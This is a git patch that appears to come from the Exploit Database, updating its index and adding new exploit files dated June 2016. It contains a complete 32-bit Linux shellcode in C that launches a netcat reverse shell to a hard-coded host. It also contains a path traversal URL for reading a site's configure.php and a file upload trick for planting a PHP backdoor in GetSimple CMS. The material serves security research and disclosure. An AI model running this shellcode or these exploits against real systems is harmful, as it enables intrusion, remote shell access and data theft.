From 3739831fb2df2a7b0a5182182776002d2a1db93a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 24 Jun 2016 05:06:19 +0000 Subject: [PATCH] DB: 2016-06-24 16 new exploits Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability ImpressPages CMS 3.8 - Stored XSS Vulnerability Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability Linux Netcat Reverse Shell - 32bit - 77 bytes PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS Getsimple CMS 3.3.10 - Arbitrary File Upload op5 v7.1.9 Configuration Command Execution op5 7.1.9 - Configuration Command Execution Alibaba Clone B2B Script - Arbitrary File Disclosure XuezhuLi FileSharing - Directory Traversal XuezhuLi FileSharing - (Add User) CSRF FinderView - Multiple Vulnerabilities --- files.csv | 30 +++-- .../arm/shellcode/{15314.S => 15314.asm} | 0 .../arm/shellcode/{15315.S => 15315.asm} | 0 .../arm/shellcode/{15316.S => 15316.asm} | 0 .../arm/shellcode/{15317.S => 15317.asm} | 0 .../webapps/{30726.2013-6922 => 30726.txt} | 0 platforms/lin_x86/shellcode/40007.c | 119 ++++++++++++++++++ .../multiple/webapps/{34148.TXT => 34148.txt} | 0 platforms/php/dos/{14678.zip => 14678.txt} | 0 .../php/webapps/{29790.JPG => 29790.txt} | 0 platforms/php/webapps/34007.txt | 96 ++------------ platforms/php/webapps/40006.txt | 13 ++ platforms/php/webapps/40008.txt | 45 +++++++ platforms/php/webapps/40009.txt | 57 +++++++++ platforms/php/webapps/40010.html | 27 ++++ platforms/php/webapps/40011.txt | 23 ++++ platforms/php/webapps/{9387.tx => 9387.txt} | 0 .../windows/dos/{15444.zip => 15444.txt} | 0 18 files changed, 312 insertions(+), 98 deletions(-) rename platforms/arm/shellcode/{15314.S => 15314.asm} (100%) rename platforms/arm/shellcode/{15315.S => 15315.asm} (100%) rename platforms/arm/shellcode/{15316.S => 15316.asm} (100%) rename platforms/arm/shellcode/{15317.S => 15317.asm} (100%) rename platforms/hardware/webapps/{30726.2013-6922 => 30726.txt} (100%) create mode 100755 platforms/lin_x86/shellcode/40007.c rename platforms/multiple/webapps/{34148.TXT => 34148.txt} (100%) rename platforms/php/dos/{14678.zip => 14678.txt} (100%) rename platforms/php/webapps/{29790.JPG => 29790.txt} (100%) create mode 100755 platforms/php/webapps/40006.txt create mode 100755 platforms/php/webapps/40008.txt create mode 100755 platforms/php/webapps/40009.txt create mode 100755 platforms/php/webapps/40010.html create mode 100755 platforms/php/webapps/40011.txt rename platforms/php/webapps/{9387.tx => 9387.txt} (100%) rename platforms/windows/dos/{15444.zip => 15444.txt} (100%) diff --git a/files.csv b/files.csv index 80646c465..36921ec70 100755 --- a/files.csv +++ b/files.csv @@ -8857,7 +8857,7 @@ id,file,description,date,author,platform,type,port 9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple Remote SQL Injection Vulnerabilities",2009-08-07,SwEET-DeViL,php,webapps,0 9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-08-07,Red-D3v1L,php,webapps,0 9386,platforms/windows/local/9386.txt,"Steam 54/894 - Local Privilege Escalation Vulnerability",2009-08-07,MrDoug,windows,local,0 -9387,platforms/php/webapps/9387.tx,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability",2009-08-07,"599eme Man",php,webapps,0 +9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability",2009-08-07,"599eme Man",php,webapps,0 9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 (forumid) Remote SQL Injection Vulnerability",2009-08-07,Ruzgarin_Oglu,php,webapps,0 9390,platforms/php/webapps/9390.txt,"Typing Pal <= 1.0 (idTableProduit) SQL Injection Vulnerability",2009-08-07,Red-D3v1L,php,webapps,0 9392,platforms/windows/dos/9392.pl,"iRehearse - (.m3u) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 @@ -12850,7 +12850,7 @@ id,file,description,date,author,platform,type,port 14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - (.m3u) Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous ",windows,local,0 14674,platforms/windows/remote/14674.txt,"Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 14687,platforms/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos,0 -14678,platforms/php/dos/14678.zip,"PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability",2010-08-18,"Canberk BOLAT",php,dos,0 +14678,platforms/php/dos/14678.txt,"PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability",2010-08-18,"Canberk BOLAT",php,dos,0 14679,platforms/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service Vulnerability",2010-08-18,"C.G. Tan",windows,dos,0 14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local SEH Exploit",2010-08-18,Dr_IDE,windows,local,0 14683,platforms/windows/dos/14683.py,"Httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) PoC",2010-08-18,Dr_IDE,windows,dos,0 @@ -13320,10 +13320,10 @@ id,file,description,date,author,platform,type,port 15310,platforms/php/webapps/15310.py,"Jamb CSRF Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0 15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0 15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0 -15314,platforms/arm/shellcode/15314.S,"ARM Bindshell port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15315,platforms/arm/shellcode/15315.S,"ARM Bind Connect UDP Port 68",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15316,platforms/arm/shellcode/15316.S,"ARM Loader Port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15317,platforms/arm/shellcode/15317.S,"ARM ifconfig eth0 and Assign Address",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15314,platforms/arm/shellcode/15314.asm,"ARM Bindshell port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15315,platforms/arm/shellcode/15315.asm,"ARM Bind Connect UDP Port 68",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15316,platforms/arm/shellcode/15316.asm,"ARM Loader Port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15317,platforms/arm/shellcode/15317.asm,"ARM ifconfig eth0 and Assign Address",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0 15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0 15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - CSRF Change Admin Password PoC",2010-10-26,Sweet,php,webapps,0 @@ -13430,7 +13430,7 @@ id,file,description,date,author,platform,type,port 15439,platforms/php/webapps/15439.txt,"Joomla Component (com_connect) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0 15440,platforms/php/webapps/15440.txt,"Joomla DCNews Component com_dcnews - Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader Remote File Inclusion Vulnerability",2010-11-06,ViciOuS,php,webapps,0 -15444,platforms/windows/dos/15444.zip,"G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0 +15444,platforms/windows/dos/15444.txt,"G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0 15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 @@ -26697,7 +26697,7 @@ id,file,description,date,author,platform,type,port 29652,platforms/php/webapps/29652.txt,"Active Calendar 1.2 data/y_3.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0 29653,platforms/php/webapps/29653.txt,"Active Calendar 1.2 data/mysqlevents.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0 29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - (.reg) Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0 -29790,platforms/php/webapps/29790.JPG,"ImpressPages CMS 3.8 - Stored XSS Vulnerability",2013-11-23,sajith,php,webapps,0 +29790,platforms/php/webapps/29790.txt,"ImpressPages CMS 3.8 - Stored XSS Vulnerability",2013-11-23,sajith,php,webapps,0 29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - Crash PoC (.wav)",2013-11-23,"Akin Tosunlar",windows,dos,0 29658,platforms/php/webapps/29658.txt,"PhotoStand 1.2 Index.php Cross-Site Scripting Vulnerability",2007-02-24,"Simon Bonnard",php,webapps,0 29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability",2007-02-25,sehato,windows,dos,0 @@ -27668,7 +27668,7 @@ id,file,description,date,author,platform,type,port 30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30724,platforms/linux/dos/30724.txt,"Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability",2007-10-31,"Bernhard Mueller",linux,dos,0 30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 -30726,platforms/hardware/webapps/30726.2013-6922,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 +30726,platforms/hardware/webapps/30726.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30728,platforms/linux/remote/30728.txt,"Yarssr 0.2.2 GUI.PM Remote Code Injection Vulnerability",2007-10-31,"Duncan Gilmore",linux,remote,0 30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0 @@ -29741,7 +29741,7 @@ id,file,description,date,author,platform,type,port 32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0 32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0 -34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0 +34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0 32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 (sorter.php sorter_value param) - SQL Injection",2014-04-22,chapp,php,webapps,80 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 @@ -30635,6 +30635,7 @@ id,file,description,date,author,platform,type,port 34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0 +40007,platforms/lin_x86/shellcode/40007.c,"Linux Netcat Reverse Shell - 32bit - 77 bytes",2016-06-23,CripSlick,lin_x86,shellcode,0 34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010 34010,platforms/win32/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0 @@ -32760,7 +32761,8 @@ id,file,description,date,author,platform,type,port 36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 -36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 +36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 +40008,platforms/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80 36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/googlemap.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter XSS",2011-11-23,Prestashop,php,webapps,0 36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 @@ -36155,7 +36157,7 @@ id,file,description,date,author,platform,type,port 39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Stored XSS",2016-06-17,"David Silveiro",php,webapps,80 39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80 -39973,platforms/linux/remote/39973.rb,"op5 v7.1.9 Configuration Command Execution",2016-06-17,metasploit,linux,remote,443 +39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,metasploit,linux,remote,443 39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 39975,platforms/lin_x86-64/shellcode/39975.c,"Linux x86_64 execve Shellcode - 15 bytes",2016-06-20,CripSlick,lin_x86-64,shellcode,0 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80 @@ -36184,3 +36186,7 @@ id,file,description,date,author,platform,type,port 39999,platforms/win64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win64,remote,21 40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)",2016-06-22,s0nk3y,php,remote,80 40005,platforms/win32/shellcode/40005.c,"Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode",2016-06-22,"Roziul Hasan Khan Shifat",win32,shellcode,0 +40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80 +40009,platforms/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80 +40010,platforms/php/webapps/40010.html,"XuezhuLi FileSharing - (Add User) CSRF",2016-06-23,HaHwul,php,webapps,80 +40011,platforms/php/webapps/40011.txt,"FinderView - Multiple Vulnerabilities",2016-06-23,HaHwul,php,webapps,80 diff --git a/platforms/arm/shellcode/15314.S b/platforms/arm/shellcode/15314.asm similarity index 100% rename from platforms/arm/shellcode/15314.S rename to platforms/arm/shellcode/15314.asm diff --git a/platforms/arm/shellcode/15315.S b/platforms/arm/shellcode/15315.asm similarity index 100% rename from platforms/arm/shellcode/15315.S rename to platforms/arm/shellcode/15315.asm diff --git a/platforms/arm/shellcode/15316.S b/platforms/arm/shellcode/15316.asm similarity index 100% rename from platforms/arm/shellcode/15316.S rename to platforms/arm/shellcode/15316.asm diff --git a/platforms/arm/shellcode/15317.S b/platforms/arm/shellcode/15317.asm similarity index 100% rename from platforms/arm/shellcode/15317.S rename to platforms/arm/shellcode/15317.asm diff --git a/platforms/hardware/webapps/30726.2013-6922 b/platforms/hardware/webapps/30726.txt similarity index 100% rename from platforms/hardware/webapps/30726.2013-6922 rename to platforms/hardware/webapps/30726.txt diff --git a/platforms/lin_x86/shellcode/40007.c b/platforms/lin_x86/shellcode/40007.c new file mode 100755 index 000000000..36105855e --- /dev/null +++ b/platforms/lin_x86/shellcode/40007.c @@ -0,0 +1,119 @@ +#include +#include + +//eben_s_dowling@georgiasouthern.edu +//OffSec ID: OS-20614 + +/* +global _start + +_start: + +;/bin//nc -e///bin/sh 10.0.0.6 99 + + xor eax,eax ; clear eax + xor edx,edx ; clear edi + + ; 0xIN-LAST IN-FIRST + + push 0x39393939 + mov esi, esp ; port in 4 hex bytes + + +push eax ; push null ------------ + + jmp short ipADDR + continue: + pop edi ; ipADDR + +push eax ; push null ------------ + + + push 0x68732F6E + push 0x69622F2F ; //bin/sh + push 0x2F2F652D ; -e// + mov ecx, esp + + +push eax ; push null ------------ + + push 0x636e2f2f ; + push 0x6e69622f ; push /bin + mov ebx, esp ; mov /bin//nc + + +push eax ; push null ----------- + + +;--------------FIRST PUSH FINISHED------------------------ + + push esi ; push port + push edi ; push ipADDR + push ecx ; push -e////bin/sh + push ebx ; push /bin//nc + +;--------------SECOND PUSH FINISHED------------------------ + + xor ecx, ecx + xor edx, edx + +;--------------REGISTERS CLEARED FOR EXECVE---------------- + mov ecx,esp ; mov /bin//nc > ecx ecx = long pointer + mov al,0x0b ; execve syscall + int 0x80 ; syscall + +ipADDR: + call continue + db "10.0.0.6" +*/ + +#define PORT "\x39\x39\x39\x39" //port = 9999 +/*To keep this shellcode at 52 bytes, +limit the port to 4 bytes*/ +#define ipADDR "\x31\x30\x2e\x30\x2e\x30\x2e\x36" //IP = 10.0.0.6 +//Both the IP & PORT are converted from ascii to hex + + + +unsigned char shellcode[] = + // <_start> +"\x31\xc0" // xor %eax,%eax +"\x31\xd2" // xor %edx,%edx +"\x68"PORT // push $0x39393939 +"\x89\xe6" // mov %esp,%esi +"\x50" // push %eax +"\xeb\x2f" // jmp 804809d + // +"\x5f" // pop %edi +"\x50" // push %eax +"\x68\x6e\x2f\x73\x68" // push $0x68732f6e +"\x68\x2f\x2f\x62\x69" // push $0x69622f2f +"\x68\x2d\x65\x2f\x2f" // push $0x2f2f652d +"\x89\xe1" // mov %esp,%ecx +"\x50" // push %eax +"\x68\x2f\x2f\x6e\x63" // push $0x636e2f2f +"\x68\x2f\x62\x69\x6e" // push $0x6e69622f +"\x89\xe3" // mov %esp,%ebx +"\x50" // push %eax +"\x56" // push %esi +"\x57" // push %edi +"\x51" // push %ecx +"\x53" // push %ebx +"\x31\xc9" // xor %ecx,%ecx +"\x31\xd2" // xor %edx,%edx +"\x89\xe1" // mov %esp,%ecx +"\xb0\x0b" // mov $0xb,%al +"\xcd\x80" // int $0x80 + // +"\xe8\xcc\xff\xff\xff" // call 804806e + ipADDR + +; + + +int main(void) +{ + printf("Shellcode length: %d\n", strlen(shellcode)); + (*(void(*)(void))shellcode)(); + return 0; +} diff --git a/platforms/multiple/webapps/34148.TXT b/platforms/multiple/webapps/34148.txt similarity index 100% rename from platforms/multiple/webapps/34148.TXT rename to platforms/multiple/webapps/34148.txt diff --git a/platforms/php/dos/14678.zip b/platforms/php/dos/14678.txt similarity index 100% rename from platforms/php/dos/14678.zip rename to platforms/php/dos/14678.txt diff --git a/platforms/php/webapps/29790.JPG b/platforms/php/webapps/29790.txt similarity index 100% rename from platforms/php/webapps/29790.JPG rename to platforms/php/webapps/29790.txt diff --git a/platforms/php/webapps/34007.txt b/platforms/php/webapps/34007.txt index 4da44e3b3..70b13902e 100755 --- a/platforms/php/webapps/34007.txt +++ b/platforms/php/webapps/34007.txt @@ -115,11 +115,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon - - - - - Vulnerability Name: SQL injection Severity: Critical @@ -154,11 +149,6 @@ Tools used: Mozilla Firefox browser - - - - - Vulnerability Name: Link Injection (facilitates Cross-Site Request Forgery) Severity: Critical Affected Users: All authenticated users @@ -208,11 +198,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon - - - - - Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/index.php @@ -256,11 +241,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon - - - - - Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/index.php @@ -306,33 +286,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon - - - - - - - - - - - - - - - - - - - - - - - - - - - Vulnerability Name: Cross-site scripting (reflected) Severity: Critical @@ -380,33 +333,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon - - - - - - - - - - - - - - - - - - - - - - - - - - - Vulnerability Name: Cross-site scripting (reflected) Severity: Critical @@ -452,6 +378,8 @@ In cases where the application's functionality allows users to author content us Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon   + + Vulnerability Name: Cross-site scripting (reflected) Severity: Critical @@ -497,6 +425,8 @@ In cases where the application's functionality allows users to author content us Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon + + Vulnerability Name: Cross-site scripting (reflected) Severity: Critical @@ -522,9 +452,6 @@ Connection: keep-alive Affected parameter(s): mainmenu - - - Steps to replicate: 26. Open Dolibarr application in browser. 27. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. @@ -543,6 +470,8 @@ In cases where the application's functionality allows users to author content us Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon   + + Vulnerability Name: Cross-site scripting (Stored) Severity: Critical @@ -1166,9 +1095,6 @@ Connection: keep-alive Affected parameter(s): leftmenu - - - Steps to replicate: 31. Open Dolibarr application in browser. 32. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. @@ -1187,6 +1113,8 @@ In cases where the application's functionality allows users to author content us Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon   + + Vulnerability Name: Cross-site scripting (reflected) Severity: Critical @@ -1227,6 +1155,8 @@ In cases where the application's functionality allows users to author content us Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon   + + Vulnerability Name: Cross-site scripting (reflected) Severity: Critical @@ -1281,9 +1211,3 @@ dol_no_mouse_hover http://localhost/dolibarr/user/logout.php dol_hide_topmenu http://localhost/dolibarr/user/logout.php dol_hide_leftmenu http://localhost/dolibarr/user/logout.php - - - - - - diff --git a/platforms/php/webapps/40006.txt b/platforms/php/webapps/40006.txt new file mode 100755 index 000000000..25ed96a7f --- /dev/null +++ b/platforms/php/webapps/40006.txt @@ -0,0 +1,13 @@ +# Exploit Title: Alibaba Clone B2B Script File Read Vulnerability +# Date: 2016-06-22 +# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com +# Vendor Homepage: http://alibaba-clone.com/ +# Version: All Versions +# Tested on: CentOS and Windows + +Exploit : +http://site/show_page.php?page=../[FilePath]%00 + +Example : +http://site/show_page.php?page=../configure.php%00 + diff --git a/platforms/php/webapps/40008.txt b/platforms/php/webapps/40008.txt new file mode 100755 index 000000000..810f72c9c --- /dev/null +++ b/platforms/php/webapps/40008.txt @@ -0,0 +1,45 @@ +# Exploit Title: Getsimple CMS <= 3.3.10 Arbitrary File Upload Vulnerability +# Google Dork: - +# Date: 23/06/2016 +# Exploit Author: s0nk3y +# Vendor Homepage: http://get-simple.info/ +# Category: webapps +# Software Link: http://get-simple.info/data/uploads/releases/GetSimpleCMS-3.3.10.zip +# Version: 3.3.10 +# Tested on: Ubuntu 16.04 / Mozilla Firefox +# Twitter: http://twitter.com/s0nk3y +# Linkedin: Rahmat Nurfauzi - http://linkedin.com/in/rahmatnurfauzi + +Description +======================== + +GetSimple CMS has been downloaded over 120,000 times (as of March 2013). +The magazine t3n assigns GetSimple as "micro" and "Minimal-CMS" one, praises +the simplicity yet possible extensibility through plug-ins. + +Vulnerability +======================== + +GetSimpleCMS Version 3.3.10 suffers from arbitrary file upload vulnerability +which allows an attacker to upload a backdoor. + +This vulnerability is that the application uses a blacklist and whitelist +technique to compare the file against mime types and extensions. + +Proof of Concept +======================== + +For exploiting this vulnerability we will create a file by adding the percent +behind extension. +1. evil.php% <--- this is simple trick :) + +2. An attacker login to the admin page and uploading the backdoor +3. The uploaded file will be under the "/data/uploads/" folder + +Report Timeline +======================== +2016-06-23 : Vulnerability reported to vendor +2016-06-23 : Disclosure \ No newline at end of file diff --git 